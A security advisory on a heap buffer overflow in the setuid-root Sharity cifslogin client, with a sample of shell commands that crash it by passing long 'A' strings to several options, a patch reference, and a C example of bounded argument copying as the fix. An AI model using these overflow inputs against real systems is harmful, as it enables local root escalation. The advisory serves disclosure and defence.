COMMAND

Sharity Cifslogin command line arguments buffer overflow

SYSTEMS AFFECTED

All releases up to A.01.06 without patch PHNE_24164. Release A.01.07 includes the fix.

PROBLEM

In Alex Hernandez advisory:

<--snap-->

A security vulnerability in the product allows local users to overflow one of the parameters (-U, -D, -P, -S, -N, -u) and cause the application to execute arbitrary code. Since the program is setuid root, elevated privileges can be gained.

In case that the attacker provides an overlong filename (for example, longer than 10000 bytes) for example parameter "-P", it would overflow a dynamically allocated buffer. The attacker could modify arbitrary memory address (such as saved return address, and function pointer, etc.) with some features of malloc()/free() implementation by overwriting the border data structure of the next dynamic memory chunk.

<--snap-->

Sample :
========

$ ./tusc /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x10000}'`
$ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x2072}'`
Memory fault
$ /opt/cifsclient/bin/cifslogin -s `perl -e '{print "A"x2072}'`
Memory fault
$ /opt/cifsclient/bin/cifslogin -f `perl -e '{print "A"x2072}'`
Memory fault
$ /opt/cifsclient/bin/cifslogin -u `perl -e '{print "A"x2072}'`
Memory fault
$ /opt/cifsclient/bin/cifslogin -S `perl -e '{print "A"x2072}'`
Memory fault
$ /opt/cifsclient/bin/cifslogin -N `perl -e '{print "A"x2072}'`
Memory fault

SOLUTION

See [http://www.software.hp.com], under the Network and System Management area. Download the patch from [http://itrc.hp.com]
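
The class of fix for this bug, as an added example that is not part of the advisory and is not HP's or Sharity's code: a setuid program checks the length of each option argument before copying it into a heap buffer, and rejects overlong input instead of truncating it. The helper name copy_option_arg and the 2048-byte capacity are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed capacity: the advisory does not state the real buffer size. */
#define OPT_BUF_SIZE 2048

/* Pattern that overflows: buf = malloc(OPT_BUF_SIZE); strcpy(buf, optarg);
 * a longer optarg runs into the allocator's data for the next chunk. */

/* Hypothetical helper: copy one option argument into a fresh heap buffer.
 * Returns 0 and sets *out, or -1 with errno set. Overlong input is rejected
 * rather than truncated, so a setuid program never acts on a shortened value. */
int copy_option_arg(const char *arg, char **out)
{
    const char *nul;
    char *buf;
    size_t len;

    if (arg == NULL || out == NULL) { errno = EINVAL; return -1; }
    *out = NULL;

    /* Bounded scan: look for the terminator only within the capacity. */
    nul = memchr(arg, '\0', OPT_BUF_SIZE);
    if (nul == NULL) { errno = E2BIG; return -1; }
    len = (size_t)(nul - arg);

    buf = malloc(OPT_BUF_SIZE);
    if (buf == NULL) return -1;          /* errno set by malloc */
    memcpy(buf, arg, len + 1);           /* len + 1 <= OPT_BUF_SIZE */
    *out = buf;
    return 0;
}

int main(void)
{
    char big[2073];                      /* constructed 2072-byte argument */
    char *val;

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("2072 bytes: %d\n", copy_option_arg(big, &val));   /* rejected */
    printf("\"guest\":    %d\n", copy_option_arg("guest", &val));
    free(val);
    return 0;
}
```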